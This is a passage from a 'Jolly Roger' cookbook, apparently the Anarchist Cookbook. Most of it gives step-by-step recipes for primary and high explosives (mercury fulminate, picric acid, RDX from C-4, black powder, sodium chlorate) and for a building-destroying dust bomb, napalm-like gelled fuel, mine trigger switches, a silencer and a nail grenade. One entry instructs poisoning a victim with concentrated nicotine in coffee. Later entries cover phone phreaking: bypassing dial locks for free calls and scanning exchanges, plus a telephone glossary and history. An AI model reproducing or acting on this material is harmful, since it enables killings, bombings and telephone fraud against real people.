ft. long, insulated. · Gasoline · 1 gallon glass jar, wide mouth (5 in. diameter by 6 in. high approx.) · Sticks · String · Teaspoon · Trays · Cup · Heavy cloth · Knife · Large flat pan or tray Sources of Carbon or Lead rods: · Dry Cell Batteries (2-« in. diameter by 7" long) or plumbing supply store. Sources of Salt Water: · Grocery store or ocean Sources of Sulfuric Acid: · Motor Vehicle Batteries. Procedure: 1.Mix « cup of salt into the one gallon glass jar with 3 liters (3 quarts) of water. 2.Add 2 teaspoons of battery acid to the solution and stir vigorously for 5 minutes. 3.Strip about 4 inches of insulation from both ends of the two wires. 4.With knife and sticks, shape 2 strips of wood 1 by 1/8 by 1-«. Tie the wood strips to the lead or carbon rods so that they are 1-« inches apart. 5.Connect the rods to the battery in a motor vehicle with the insulated wire. 6.Submerge 4-« inches of the rods in the salt water solution. 7.With gear in neutral position, start the vehicle engine. Depress the accelerator approx. 1/5 of its full travel. 8.Run the engine with the accelerator in this position for 2 hours, then shut it down for 2 hours. 9.Repeat this cycle for a total of 64 hours while maintaining the level of the acid-salt water solution in the glass jar. CAUTION: This arrangement employs voltages which can be quite dangerous! Do not touch bare wire leads while engine is running!! 10.Shut off the engine. Remove the rods from the glass jar and disconnect wire leads from the battery. 11.Filter the solution through the heavy cloth into a flat pan or tray, leaving the sediment at the bottom of the glass jar. 12.Allow the water in the filtered solution to evaporate at room temperature (approx. 16 hours). The residue is approximately 60% or more sodium chlorate which is pure enough to be used as an explosive ingredient. 131.Mercury Fulminate by the Jolly Roger Mercury Fulminate is used as a primary explosive in the fabrication of detonators. It is to be used with a booster explosive such as picric acid or RDX (which are elsewhere in this Cookbook). Material Required: · Nitric Acid, 90% conc. (1.48 sp. gr) · Mercury · Ethyl (grain) alcohol (90%) · Filtering material [Paper Towels] · Teaspoon measure (, «, and 1 tsp. capacity)-aluminum, stainless steel or wax coated · Heat Source · Clean wooden stick · Clean water · Glass containers · Tape · Syringe Source of Nitric Acid: · Elsewhere in this Cookbook · Industrial metal processors Source of Mercury: · Thermometers · Mercury switches · Old radio tubes Procedure: 1.Dilute 5 teaspoons of nitric acid with 2-« teaspoons of clean water in a glass container by adding the acid to the water. 2.Dissolve 1/8 teaspoon of mercury in the diluted nitric acid. This will yield dark red fumes. NOTE: It may be necessary to add water, on drop at a time, to the mercury-acid solution in order to start a reaction. · CAUTION: Acid will burn skin and destroy clothing. If any is spilled, wash it away with a large quantity of water. Do NOT inhale fumes! 3.Warm 10 teaspoons of the alcohol in a container until the alcohol feels warm to the inside of the wrist. 4.Pour the metal-acid solution into the warm alcohol. Reaction should start in less than 5 minutes. Dense white fumes will be given off during the reaction. As time lapses, the fumes will become less dense. Allow 10 to 15 minutes to complete reaction. Fulminate will settle to the bottom. · CAUTION: This reaction generates large quantities of toxic, flammable fumes. The process MUST be conducted outdoors or in a well-ventilated area, away from sparks or open flames. DO NOT inhale fumes! 5.Filter the solution through a paper towel into a container. Crystals may stick to the side of the container. If so, tilt and squirt water down the sides of the container until all of the material collects on the filter paper. 6.Wash the crystals with 6 teaspoons of ethyl alcohol. 7.Allow these mercury fulminate crystals to air dry. · CAUTION: Handle dry explosive with great care. Do not scrape or handle it roughly! Keep away from sparks or open flames. Store in a cool, dry place. 132.Improvised Black Powder by The Jolly Roger Black powder can be prepared in a simple, safe manner. It may be used as blasting or gun powder. Materials: · Potassium Nitrate, granulated, 3 cups (3/4 liter) · Wood charcoal, powdered, 2 cups · Sulfur, powdered, « cup · Alcohol, 5 pints (2-« liters) (whiskey, rubbing alcohol, etc.) · Water, 3 cups (3/4 liter) · Heat source · 2 buckets - each 2 gallon (7-« liters) capacity, at least one of which is heat resistant (metal, ceramic, etc.) · Flat window screening, at least 1 foot (30 cm) square · Large wooden stick · Cloth, at least 2 feet (60 cm) square Procedure: 1.Place alcohol in one of the buckets. 2.Place potassium nitrate, charcoal, and sulfur in the heat resistant bucket. Add 1 cup water and mix thoroughly with wooden stick until all ingredients are dissolved. 3.Add remaining water (2 cups) to mixture. Place bucket on heat source and stir until small bubbles begin to form. · CAUTION: DO NOT boil mixture. Be sure ALL mixture stays wet. If any is dry, as on sides of pan, it may ignite! 4.Remove bucket from heat and pour mixture into alcohol while stirring vigorously. 5.Let alcohol mixture stand about 5 minutes. Strain mixture through cloth to obtain black powder. Discard liquid. Wrap cloth around black powder and squeeze to remove all excess liquid. 6.Place screening over dry bucket. Place workable amount of damp powder on screen and granulate by rubbing solid through screen. NOTE: If granulated particles appear to stick together and change shape, recombine entire batch of powder and repeat steps 5 & 6. 7.Spread granulated black powder on flat, dry surface so that layer about « inch (1- cm) is formed. Allow to dry. Use radiator, or direct sunlight. This should be dried as soon as possible, preferably in an hour. The longer the drying period, the less effective the black powder. · CAUTION: Remove from heat AS SOON AS granules are dry. Black powder is now ready to use. 133.Nitric Acid by The Jolly Roger Nitric Acid is used in the preparation of many explosives, incendiary mixtures, and acid delay timers. It may be prepared by distilling a mixture of potassium nitrate and concentrated sulfuric acid. Material Required: · Potassium Nitrate (2 parts by volume) · CONCENTRATED sulfuric acid (1 part by volume) · 2 bottles or ceramin jugs (narrow necks are preferable) · Pot or frying pan · Heat source (wood, charcoal, or coal) · Tape (paper, electrical, masking, but NOT cellophane!) · Paper or rags IMPORTANT: If sulfuric acid is obtained from a motor vehicle battery, concentrate it by boiling it UNTIL white fumes appear. DO NOT INHALE FUMES. NOTE: The amount of nitric acid produced is the same as the amount of potassium nitrate. Thus, for two tablespoons of nitric acid, use 2 tablespoons of potassium nitrate and 1 tablespoonful of concentrated sulfuric acid. Source of Potassium Nitrate: · Elsewhere in this Cookbook · Drug stores Source of CONCENTRATED sulfuric acid: · Motor vehicle batteries · Industrial plants Procedure: 1.Place dry potassium nitrate in bottle or jug. Add sulfuric acid. Do not fill the bottle more than full. Mix until paste is formed. · CAUTION: DO NOT INHALE FUMES! 2.Wrap paper or rags around necks of two bottles. securely tape necks of two bottles together. Be sure that bottles are flush against each other and that there are no air spaces. 3.Support bottles on rocks or cans so that empty bottle is SLIGHTLY lower than bottle containing paste so that nitric acid that is formed in receiving bottle will not run into other bottle. 4.Build fire in pot or frying pan. 5.Gently heat bottle containing mixture by gently moving fire in and out. As red fumes begin to appear periodically pour cool water over empty receiving bottle. Nitric acid will begin to form in receiving bottle. · CAUTION: Do not overheat or wet bottle containing mixture or it may shatter. As an added precaution, place bottle to be heated in heat resistant container filled with sand or gravel. Heat this outer container to produce nitric acid. 6.Continue the above process until no more red fumes are formed. If the nitric acid formed in the receiving bottle is not clear (cloudy) pour it into cleaned bottle and repeat steps 2-6. · CAUTION: Nitric acid should be kept away from all combustibles and should be kept in a SEALED CERAMIC OR GLASS container. DO NOT inhale fumes! 134.Dust Bomb Instructions by The Jolly Roger An initiator which will initiate common material to produce dust explosions can be rapidly and easily constructed. This type of charge is ideal for the destruction of enclosed areas such as rooms or buildings. Material Required: · A flat can, 3 in. (8 cm) in diameter and 1-« in. (3-3/4 cm) high. A 6-« ounce tuna can serves the purpose quite well. · Blasting cap · Explosive · Aluminum (may be wire, cut sheet, flattened can, or powder) · Large nail, 4 in. (10 cm) long · Wooden rod - in. (6 mm) diameter · Flour, gasoline, and powder or chipped aluminum NOTE: Plastic explosive produce better explosions than cast explosives. Procedure: 1.Using the nail, press a hole through the side of the tuna can 3/8 inch to « inch (1 to 1-« cm) from the bottom. Using a rotating and lever action, enlarge the hole until it will accommodate the blasting cap. 2.Place the wooden rod in the hole and position the end of the rod at the center of the can. 3.Press explosive into the can, being sure to surround the rod, until it is 3/4 inch (2 cm) from the top of the can. Carefully remove the wooden rod. 4.Place the aluminum metal on top of the explosive. 5.Just before use, insert the blasting cap into the cavity made by the rod. The initiator is now ready to use. NOTE: If it is desired to carry the initiator some distance, cardboard may be pressed on top of the aluminum to insure against loss of material. How to Use: This particular unit works quite well to initiate charges of five pounds of flour, « gallon (1-2/3 liters) of gasoline, or two pounds of flake painters aluminum. The solid materials may merely be contained in sacks or cardboard cartons. The gasoline may be placed in plastic coated paper milk cartons, as well as plastic or glass bottles. The charges are placed directly on top of the initiator and the blasting cap is actuated electrically or by a fuse depending on the type of cap employed. this will destroy a 2,000 cubic feet enclosure (building 10 x 20 x 10 feet). Note: For larger enclosures, use proportionally larger initiators and charges. 135.Carbon-Tet Explosive by The Jolly Roger A moist explosive mixture can be made from fine aluminum powder combined with carbon tetrachloride or tetrachloroethylene. This explosive can be detonated with a blasting cap. Material Required: · Fine aluminum bronzing powder · Carbon Tetrachloride or Tetrachloroethylene · Stirring rod (wood) · Mixing container (bowl, bucket, etc.) · Measuring container (cup, tablespoon, etc.) · Storage container (jar, can, etc.) · Blasting cap · Pipe, can or jar Source of Carbon Tetrachloride: · Paint store · Pharmacy · Fire extinguisher fluid Source of Tetrachloroethylene: · Dry cleaners · Pharmacy Procedure: 1.Measure out two parts aluminum powder to one part carbon tetrachloride or tetrachlorethylene liquid into mixing container, adding liquid to powder while stirring with the wooden rod. 2.Stir until the mixture becomes the consistency of honey syrup. · CAUTION: Fumes from the liquid are dangerous and should not be inhaled. 3.Store explosive in a jar or similar water proof container until ready to use. The liquid in the mixture evaporates quickly when not confined. NOTE: Mixture will detonate in this manner for a period of 72 hours. How to Use: 1.Pour this mixture into an iron or steel pipe which has an end cap threaded on one end. If a pipe is not available, you may use a dry tin can or glass jar. 2.Insert blasting cap just beneath the surface of the explosive mix. NOTE: Confining the open end of the container will add to the effectiveness of the explosive. 136.Making Picric Acid from Aspirin by The Jolly Roger Picric Acid can be used as a booster explosive in detonators, a high explosive charge, or as an intermediate to preparing lead picric. Material Required: · Aspirin tablets (5 grains per tablet) · Alcohol, 95% pure · Sulfuric acid, concentrated, (if battery acid, boil until white fumes disappear) · Potassium Nitrate (see elsewhere in this Cookbook) · Water · Paper towels · Canning jar, 1 pint · Rod (glass or wood) · Glass containers · Ceramic or glass dish · Cup · Teaspoon · Tablespoon · Pan · Heat source · Tape Procedure: 1.Crush 20 aspirin tablets in a glass container. Add 1 teaspoon of water and work into a paste. 2.Add approximately 1/3 to « cup of alcohol (100 milliliters) to the aspirin paste; stir while pouring. 3.Filter the alcohol-aspirin solution through a paper towel into another glass container. Discard the solid left in the paper towel. 4.Pour the filtered solution into a glass or ceramic dish. 5.Evaporate the alcohol and water from the solution by placing the dish into a pan of hot water. White powder will remain in the dish after evaporation. · NOTE: The water in the pan should be at hot bath temperature, not boiling, approx 160øF to 180øF. It should not burn the hands. 6.Pour 1/3 cup (80 milliliters) of concentrated sulfuric acid into a canning jar. Add the white powder to the sulfuric acid. 7.Heat canning jar of sulfuric acid in a pan of simmering hot water bath for 15 minutes; then remove jar from the bath. Solution will turn to a yellow-orange color. 8.Add 3 level teaspoons (15 grams) of potassium nitrate in three portions to the yellow-orange solution; stir vigorously during additions. Solution will turn red, then back to a yellow-orange color. 9.Allow the solution to cool to ambient room temperature while stirring occasionally. 10.Slowly pour the solution, while stirring, into 1- cup (300 milliliters) of cold water and allow to cool. 11.Filter the solution through a paper towel into a glass container. Light yellow particles will collect on the paper towel. 12.Wash the light yellow particles with 2 tablespoons (25 milliliters) of water. Discard the waste liquid in the container. 13.Place articles in ceramic dish and set in a hot water bath, as in step 5, for 2 hours. 137.Reclamation of RDX from C-4 Explosives by the Jolly Roger RDX can be obtained from C-4 explosives with the use of gasoline. It can be used as a booster explosive for detonators or as a high explosive charge. Material Required: · Gasoline · C-4 explosive · 2 - pint glass jars, wide mouth · Paper towels · Stirring rod (glass or wood) · Water · Ceramic or glass dish · Pan · Heat source · Teaspoon · Cup · Tape NOTE: Water, Ceramic or glass dish, pan, & heat source are all optional. The RDX can be air dried instead. Procedure: 1.Place 1-« teaspoons (15 grams) of C-4 explosive in one of the pint jars. Add 1 cup (240 milliliters) of gasoline. · NOTE: These quantities can be increased to obtain more RDX. For example, use 2 gallons of gasoline per 1 cup of C-4. 2.Knead and stir the C-4 with the rod until the C-4 has broken down into small particles. Allow mixture to stand for « hour. 3.Stir the mixture again until a fine white powder remains on the bottom of the jar. 4.Filter the mixture through a paper towel into the other glass jar. Wash the particles collected on the paper towel with « cup (120 milliliters) of gasoline. Discard the waste liquid. 5.Place the RDX particles in a glass or ceramic dish. Set the dish in a pan of hot water, not boiling and dry for a period of 1 hour. · NOTE: The RDX particles may be air dried for a period of 2 to 3 hours. 138.Egg-based Gelled Flame Fuels by The Jolly Roger The white of any bird egg can be used to gel gasoline for use as a flame fuel which will adhere to target surfaces. Materials Required: Parts by Volume Ingredient How used Common Source 85 Gasoline Motor Fuel Gas Stations Stove Fuel Motor Vehicle Solvent 14 Egg Whites Food Food Store Industrial Farms Processes Any one of the following: 1 Table Salt Food Sea Water Industrial Natural Brine Processes Food Store 3 Ground Coffee Food Coffee Plant Food Store 3 Dried Tea Leaves Food Tea Plant Food Store 3 Cocoa Food Cacao Tree Food Store 2 Sugar Sweetening Sugar Cane Foods Food Store 1 Saltpeter Pyrotechnics Natural (Potassium Nitrate) Explosives Deposits Matches Drug Store Medicine 1 Epsom Salts Medicine Natural Mineral Water Kisserite Industrial Drug Store Processes Food Store 2 Washing Soda Washing Cleaner Food Store (Sal Soda) Medicine Drug Store Photography Photo Supply Store 1 « Baking Soda Baking Food Store Beverages Drug Store Medicines Mineral Waters 1 « Aspirin Medicine Drug Store Food Store Procedure: CAUTION: Make sure that there are no open flames in the area when mixing flame fuels! NO SMOKING!! 1.Separate the egg white from the yolk. This can be done by breaking the egg into a dish and carefully removing the yolk with a spoon. 2.Pour egg white into a jar, bottle, or other container, and add gasoline. 3.Add the salt (or other additive) to the mixture and stir occasionally until gel forms (about 5 to 10 minutes). NOTE: A thicker gelled flame fuel can be obtained by putting the capped jar in hot (65øC) water for about « hour and then letting them cool to room temperature. (DO NOT HEAT THE GELLED FUEL CONTAINING COFFEE!!) 139.Clothespin Switch by The Jolly Roger A spring type clothespin is used to make a circuit closing switch to actuate explosive charges, mines, booby traps, and alarm systems. Material Required: · Spring type clothespin · Sold copper wire -- 1/16 in. (2 mm) in diameter · Strong string on wire · Flat piece of wood (roughly 1/8 x 1" x 2") · Knife Procedure: 1.Strip four in. (10 cm) of insulation from the ends of 2 solid copper wires. Scrape the copper wires with pocket knife until the metal is shiny. 2.Wind one scraped wire tightly on jaw of the clothespin, and the other wire on the other jaw. 3.Make a hole in one end of the flat piece of wood using a knife, heated nail or drill. 4.Tie strong string or wire through the hole. 5.Place flat piece of wood between the jaws of the clothespin switch. Basic Firing Circuit: ______________ | |---------------------------\ | initiator |----------\ | strong -------------- | | twine | | \ | _---------_________ | --------- | | \clothespin \ / \ / switch \ / \ / \ / + - ---------- | | | battery| ---------- When the flat piece of wood is removed by pulling the string, the jaws of the clothespin will close, completing the circuit. CAUTION: Do not attach the battery until the switch and trip wire have been emplaced and examined. Be sure that the flat piece of wood is separating the jaws of the switch. 140.Flexible Plate Switch by The Jolly Roger This flexible plate switch is used for initiating emplaced mines and explosives. Material Required: · Two flexible metal sheets: · One approximately 10 in. (25 cm) square · One approximately 10 in. x 8 in. (20 cm) · Piece of wood 10 in. square x 1 in. thick · Four soft wood blocks 1 in. x 1 in. x in. · Eight flat head nails, 1 in. long · Connecting wires · Adhesive tape Procedure: 1.Nail 10 in. by 8 in. metal sheet to 10 in. square piece of wood so that 1 in. of wood shows on each side of the metal. Leave one of the nails sticking up about in. 2.Strip insulation from the end of one connecting wire. Wrap this end around the nail and drive the nail all the way in. 3.Place the four wood blocks on the corners of the wood base. 4.Place the 10 in. square flexible metal sheet so that it rests on the blocks in line with the wood base. 5.Drive four nails through the metal sheet and the blocks (1 per block) to fasten the sheet to the wood base. A second connecting wire is attached to one of the nails as in step #2. 6.Wrap the adhesive tape around the edges of the plate and wood base. This will assure that no dirt or other foreign matter will get between the plates and prevent the switch from operating. How to use: The switch is placed in a hole in the path of expected traffic and covered with a thin layer of dirt or other camouflaging material. The mine or other explosive device connected to the switch can be buried with the switch or emplaced elsewhere as desired. When a vehicle passes over the switch, the two metal plates make contact closing the firing circuit. 141.Low Signature Systems (Silencers) by The Jolly Roger Low signature systems (silencers) for improvised small arms weapons can be made from steel gas or water pipe and fittings. Material Required: · Grenade Container · Steel pipe nipple, 6 in. (15 cm) long - (see table 1 for diameter) · 2 steel pipe couplings - (see table 2 for dimensions) · Cotton cloth - (see table 2) · Drill · Absorbent cotton Procedure: 1.Drill hole in grenade container at both ends to fit outside diameter of pipe nipple. (see table 1) -> /----------------------\ / | | 2.75 in | ) ( <-holes dia. \ | | -> \-----------------------/ |-----------------------| 5 in. 2.Drill four rows of holes in pipe nipple. Use table 1 for diameter and location of holes. (Note: I suck at ASCII art!) 6 in. |-----------------------------------| _____________________________________ ___ | O O O O O O O O O O O O O O O O O | | C (nom. dia.) ------------------------------------- (size of hole) | \ / (space between) B (dia.) A 3.Thread one of the pipe couplings on the drilled pipe nipple. 4.Cut coupling length to allow barrel of weapon to thread fully into low signature system. Barrel should butt against end of the drilled pipe nipple. 5.Separate the top half of the grenade container from the bottom half. 6.Insert the pipe nipple in the drilled hole at the base of the bottom half of the container. Pack the absorbent cotton inside the container and around the pipe nipple. 7.Pack the absorbent cotton in top half of grenade container leaving hole in center. Assemble container to the bottom half. 8.Thread the other coupling onto the pipe nipple. Note: A longer container and pipe nipple, with same "A" and "B" dimensions as those given, will further reduce the signature of the system. How to use: 1.Thread the low signature system on the selected weapon securely. 2.Place the proper cotton wad size into the muzzle end of the system (see table 2) 3.Load weapon 4.Weapon is now ready for use TABLE 1 Low Signature System Dimensions Coupling Holes per 4 rows A B C D Row Total .45 cal 3/8in in 3/8in 3/8in 12 48 .38 cal 3/8in in in in 12 48 9 mm 3/8in in in in 12 48 7.62 mm 3/8in in in in 12 48 .22 cal in 5/32in 1/8*in 1/8in 14 50 * Extra Heavy Pipe TABLE 2 Cotton Wadding Sizes Weapon Cotton Wadding Size .45 cal 1-« x 6 inches .38 cal 1 x 4 inches 9 mm 1 x 4 inches 7.62 mm 1 x 4 inches .22 cal Not needed 142.Delay Igniter from a Cigarette by The Jolly Roger A simple and economical (everyone wants to save money haha) time delay can be made with a common cigarette. Materials Required: · Cigarette · Paper match · String (shoelace or similar cord) · Fuse cord (improvised or commercial) Procedure: 1.Cut end of fuse cord at a slant to expose inner core 2.Light cigarette in normal fashion. Place a paper match so that the had is over exposed end of fuse cord and tie both to the side of the burning cigarette with string. 3.Position the burning cigarette with fuse so that it burns freely. A suggested method is to hang the delay on a twig. Note: Common dry cigarettes burn about 1 inch every 7 or 8 minutes in still air. (Now I am talking about all except American brands, which burn about 1 inch every 4-5 minutes) If the fuse cord is place one inch from the burning end of the cigarette a time delay of 7 or 8 minutes will result. Delay time will vary depending upon type of cigarette, wind, moisture, and other atmospheric conditions (get to know your cigarette!) To obtain accurate delay time, a test run should be made under "use" conditions. 143.Nicotine by The Jolly Roger Nicotine is an abundant poison. Easily found in tobacco products, in concentrated form a few drops can quickly kill someone. Here is how to concentrate it: First get a can of chewing tobacco or pipe tobacco. Remove the contents and soak in water overnight in a jar (about 2/3 cup of water will do...). In the morning, strain into another jar the mixture through a porous towel. Then wrap the towel around the ball of tobacco and squeeze it until all of the liquid is in the jar. Throw away the tobacco--you will not need it anymore. Now you have two options. I recommend the first. It makes the nicotine more potent. 1.Allow to evaporate until a sticky syrup results in the jar. This is almost pure nicotine (hell, it is pure enough for sure!). 2.Heat over low flame until water is evaporated and a thick sticky syrup results (I don't know how long it takes... shouldn't take too long, though.). Now all you have to do, when you wish to use it, is to put a few drops in a medicine dropper or equivalent, and slip about 4 or 5 drops into the victim's coffee. Coffee is recommended since it will disguise the taste. Since nicotine is a drug, the victim should get quite a buzz before they turn their toes up to the daisies, so to speak. Note: If the syrup is too sticky, dilute it with a few drops of water. And while you are at it, better add an extra drop to the coffee just to be sure! 144.Dried Seed Timer by The Jolly Roger A time delay device for electrical firing circuits can be made using the principle of expansion of dried seeds. Material Required: · Dried peas, beans, or other dehydrated seeds · Wide-mouth glass jar with non-metal cap · Two screws or bolts · Thin metal plate · Hand drill · Screwdriver Procedure: 1.Determine the rate of the rise of the dried seeds selected. This is necessary to determine the delay time of the timer. · Place a sample of the dried seeds in the jar and cover with water. · Measure the time it takes for the seeds to rise a given height. Most dried seeds increase 50% in one to two hours. 2.Cut a disc from thin metal plate. Disc should fit loosely inside the jar. NOTE: If metal is painted, rusty, or otherwise coated, it must be scraped or sanded to obtain a clean metal surface 3.Drill two holes in the cap of the jar about 2 inches apart. Diameter of holes should be such that screws or bolts will thread tightly into them. If the jar has a metal cap or no cap, a piece of wood or plastic (NOT METAL) can be used as a cover. 4.Turn the two screws or bolts through the holes in the cap. Bolts should extend about one in. (2 « cm) into the jar. IMPORTANT: Both bolts must extend the same distance below the container cover. 5.Pour dried seeds into the container. The level will depend upon the previously measured rise time and the desired delay. 6.Place the metal disc in the jar on top of the seeds. How to use: 1.Add just enough water to completely cover the seeds and place the cap on the jar. 2.Attach connecting wires from the firing circuit to the two screws on the cap. Expansion of the seeds will raise the metal disc until it contacts the screws and closes the circuit. 145.Nail Grenade by The Jolly Roger Effective fragmentation grenades can be made from a block of TNT or other blasting explosive and nails. Material Required: · Block of TNT or other blasting explosive · Nails · Non-electric (military or improvised) blasting cap · Fuse Cord · Tape, string, wire, or glue Procedure: 1.If an explosive charge other than a standard TNT block is used, make a hole in the center of the charge for inserting the blasting cap. TNT can be drilled with relative safety. With plastic explosives, a hole can be made by pressing a round stick into the center of the charge. The hole should be deep enough that the blasting cap is totally within the explosive. 2.Tape, tie, or glue one or two rows of closely packed nails to the sides of the explosive block. Nails should completely cover the four surfaces of the block. 3.Place blasting cap on one end of the fuse cord and crimp with pliers. NOTE: To find out how long the fuse cord should be, check the time it takes a known length to burn. If 12 inches (30 cm) burns for 30 seconds, a 10 second delay will require a 4 inch (10 cm) fuse. 4.Insert the blasting cap in the hole in the block of explosive. Tape or tie fuse cord securely in place so that it will not fall out when the grenade is thrown. Alternate Use: An effective directional anti-personnel mine can be made by placing nails on only one side of the explosive block. For the case, and electric blasting cap can be used. 146.The Bell Glossary by The Jolly Roger ACD: Automatic Call Distributor - A system that automatically distributes calls to operator pools (providing services such as intercept and directory assistance), to airline ticket agents, etc. Administration: The tasks of record-keeping, monitoring, rearranging, prediction need for growth, etc. AIS: Automatic Intercept System - A system employing an audio-response unit under control of a processor to automatically provide pertinent info to callers routed to intercept. Alert: To indicate the existence of an incoming call, (ringing). ANI: Automatic Number Identification - Often pronounced "Annie," a facility for automatically identify the number of the calling party for charging purposes. Appearance: A connection upon a network terminal, as in "the line has two network appearances." Attend: The operation of monitoring a line or an incoming trunk for off-hook or seizure, respectively. Audible: The subdued "image" of ringing transmitted to the calling party during ringing; not derived from the actual ringing signal in later systems. Backbone Route: The route made up of final-group trunks between end offices in different regional center areas. BHC: Busy Hour Calls - The number of calls placed in the busy hour. Blocking: The ratio of unsuccessful to total attempts to use a facility; expresses as a probability when computed a priority. Blocking Network: A network that, under certain conditions, may be unable to form a transmission path from one end of the network to the other. In general, all networks used within the Bell Systems are of the blocking type. Blue Box: Equipment used fraudulently to synthesize signals, gaining access to the toll network for the placement of calls without charge. BORSCHT Circuit: A name for the line circuit in the central office. It functions as a mnemonic for the functions that must be performed by the circuit: Battery, Overvoltage, Ringing, Supervision, Coding, Hybrid, and Testing. Busy Signal: (Called-line-busy) An audible signal which, in the Bell System, comprises 480hz and 620hz interrupted at 60IPM. Bylink: A special high-speed means used in crossbar equipment for routing calls incoming from a step-by-step office. Trunks from such offices are often referred to as "bylink" trunks even when incoming to noncrossbar offices; they are more properly referred to as "dc incoming trunks." Such high-speed means are necessary to assure that the first incoming pulse is not lost. Cable Vault: The point which phone cable enters the Central Office building. CAMA: Centralized Automatic Message Accounting - Pronounced like Alabama. CCIS: Common Channel Interoffice Signaling - Signaling information for trunk connections over a separate, nonspeech data link rather that over the trunks themselves. CCITT: International Telegraph and Telephone Consultative Committee- An International committee that formulates plans and sets standards for intercountry communication means. CDO: Community Dial Office - A small usually rural office typically served by step-by-step equipment. CO: Central Office - Comprises a switching network and its control and support equipment. Occasionally improperly used to mean "office code." Centrex: A service comparable in features to PBX service but implemented with some (Centrex CU) or all (Centrex CO) of the control in the central office. In the later case, each station's loop connects to the central office. Customer Loop: The wire pair connecting a customer's station to the central office. DDD: Direct Distance Dialing - Dialing without operator assistance over the nationwide intertoll network. Direct Trunk Group: A trunk group that is a direct connection between a given originating and a given terminating office. EOTT: End Office Toll Trunking - Trunking between end offices in different toll center areas. ESB: Emergency Service Bureau - A centralized agency to which 911 "universal" emergency calls are routed. ESS: Electronic Switching System - A generic term used to identify as a class, stored-program switching systems such as the Bell System's No.1 No.2, No.3, No.4, or No«. ETS: Electronic Translation Systems - An electronic replacement for the card translator in 4A Crossbar systems. Makes use of the SPC 1A Processor. False Start: An aborted dialing attempt. Fast Busy: (often called reorder) - An audible busy signal interrupted at twice the rate of the normal busy signal; sent to the originating station to indicate that the call blocked due to busy equipment. Final Trunk Group: The trunk group to which calls are routed when available high-usage trunks overflow; these groups generally "home" on an office next highest in the hierarchy. Full Group: A trunk group that does not permit rerouting off-contingent foreign traffic; there are seven such offices. Glare: The situation that occurs when a two-way trunk is seized more or less simultaneously at both ends. High Usage Trunk Group: The appellation for a trunk group that has alternate routes via other similar groups, and ultimately via a final trunk group to a higher ranking office. Intercept: The agency (usually an operator) to which calls are routed when made to a line recently removed from a service, or in some other category requiring explanation. Automated versions (ASI) with automatic voice response units are growing in use. Interrupt: The interruption on a phone line to disconnect and connect with another station, such as an Emergence Interrupt. Junctor: A wire or circuit connection between networks in the same office. The functional equivalent to an intraoffice trunk. MF: Multi-Frequency - The method of signaling over a trunk making use of the simultaneous application of two out of six possible frequencies. NPA: Numbering Plan Area. ONI: Operator Number Identification - The use of an operator in a CAMA office to verbally obtain the calling number of a call originating in an office not equipped with ANI. PBX: Private Branch Exchange - (PABX: Private Automatic Branch Exchange) An telephone office serving a private customer, Typically , access to the outside telephone network is provided. Permanent Signal: A sustained off-hook condition without activity (no dialing or ringing or completed connection); such a condition tends to tie up equipment, especially in earlier systems. Usually accidental, but sometimes used intentionally by customers in high-crime-rate areas to thwart off burglars. POTS: Plain Old Telephone Service - Basic service with no extra "frills". ROTL: Remote Office Test Line - A means for remotely testing trunks. RTA: Remote Trunk Arrangement - An extension to the TSPS system permitting its services to be provided up to 200 miles from the TSPS site. SF: Single Frequency. A signaling method for trunks: 2600hz is impressed upon idle trunks. Supervise: To monitor the status of a call. SxS: (Step-by-Step or Strowger switch) - An electromechanical office type utilizing a gross-motion stepping switch as a combination network and distributed control. Talkoff: The phenomenon of accidental synthesis of a machine-intelligible signal by human voice causing an unintended response. "whistling a tone". Trunk: A path between central offices; in general 2-wire for interlocal, 4-wire for intertoll. TSPS: Traffic Service Position System - A system that provides, under stored-program control, efficient operator assistance for toll calls. It does not switch the customer, but provides a bridge connection to the operator. X-bar: (Crossbar) - An electromechanical office type utilizing a "fine-motion" coordinate switch and a multiplicity of central controls (called markers). There are four varieties: · No.1 Crossbar: Used in large urban office application; (1938) · No.3 Crossbar: A small system started in (1974). · No.4A/4M Crossbar: A 4-wire toll machine; (1943). · No« Crossbar: A machine originally intended for relatively small suburban applications; (1948) Crossbar Tandem: A machine used for interlocal office switching. 147.Phone Dial Locks -- How to Beat'em by The Jolly Roger Have you ever been in an office or somewhere and wanted to make a free phone call but some asshole put a lock on the phone to prevent out-going calls? Fret no more phellow phreak, for every system can be beaten with a little knowledge! There are two ways to beat this obstacle, first pick the lock, I don't have the time to teach locksmithing so we go to the second method which takes advantage of telephone electronics. To be as simple as possible when you pick up the phone you complete a circuit known as a local loop. When you hang up you break the circuit. When you dial (pulse) it also breaks the circuit but not long enough to hang up! So you can "Push-dial." To do this you >>> RAPIDLY <<< depress the switchhook. For example, to dial an operator (and then give her the number you want to call) >>> RAPIDLY <<< & >>> EVENLY <<< depress the switchhook 10 times. To dial 634-1268, depress 6 X'S pause, then 3 X'S, pause, then 4X'S, etc. It takes a little practice but you'll get the hang of it. Try practicing with your own # so you'll get a busy tone when right. It'll also work on touch-toneÖ since a DTMF line will also accept pulse. Also, never depress the switchhook for more than a second or it'll hang up! Finally, remember that you have just as much right to that phone as the asshole who put the lock on it! 148.Exchange Scanning by The Jolly Roger Almost every exchange in the bell system has test #'s and other "goodies" such as loops with dial-ups. These "goodies" are usually found between 9900 and 9999 in your local exchange. If you have the time and initiative, scan your exchange and you may become lucky! Here are some findings in the 914-268 exchange: 9900 - ANI 9901 - ANI 9927 - OSC. TONE (POSSIBLE TONE SIDE OF A LOOP) 9936 - VOICE # TO THE TELCO CENTRAL OFFICE 9937 - VOICE # TO THE TELCO CENTRAL OFFICE 9941 - COMPUTER (DIGITAL VOICE TRANSMISSION?) 9960 - OSC. TONE (TONE SIDE LOOP) MAY ALSO BE A COMPUTER IN SOME EXCHANGES 9961 - NO RESPONSE (OTHER END OF LOOP?) 9962 - NO RESPONSE (OTHER END OF LOOP?) 9963 - NO RESPONSE (OTHER END OF LOOP?) 9966 - COMPUTER (SEE 9941) 9968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE KEYS Most of the numbers between 9900 & 9999 will ring or go to a "what #, please?" operator. 149.A Short History of Phreaking by The Jolly Roger Well now we know a little vocabulary, and now its into history, Phreak history. Back at MIT in 1964 arrived a student by the name of Stewart Nelson, who was extremely interested in the telephone. Before entering MIT, he had built autodialers, cheese boxes, and many more gadgets. But when he came to MIT he became even more interested in "fone-hacking" as they called it. After a little while he naturally started using the PDP-1, the schools computer at that time, and from there he decided that it would be interesting to see whether the computer could generate the frequencies required for blue boxing. The hackers at MIT were not interested in ripping off Ma Bell, but just exploring the telephone network. Stew (as he was called) wrote a program to generate all the tones and set off into the 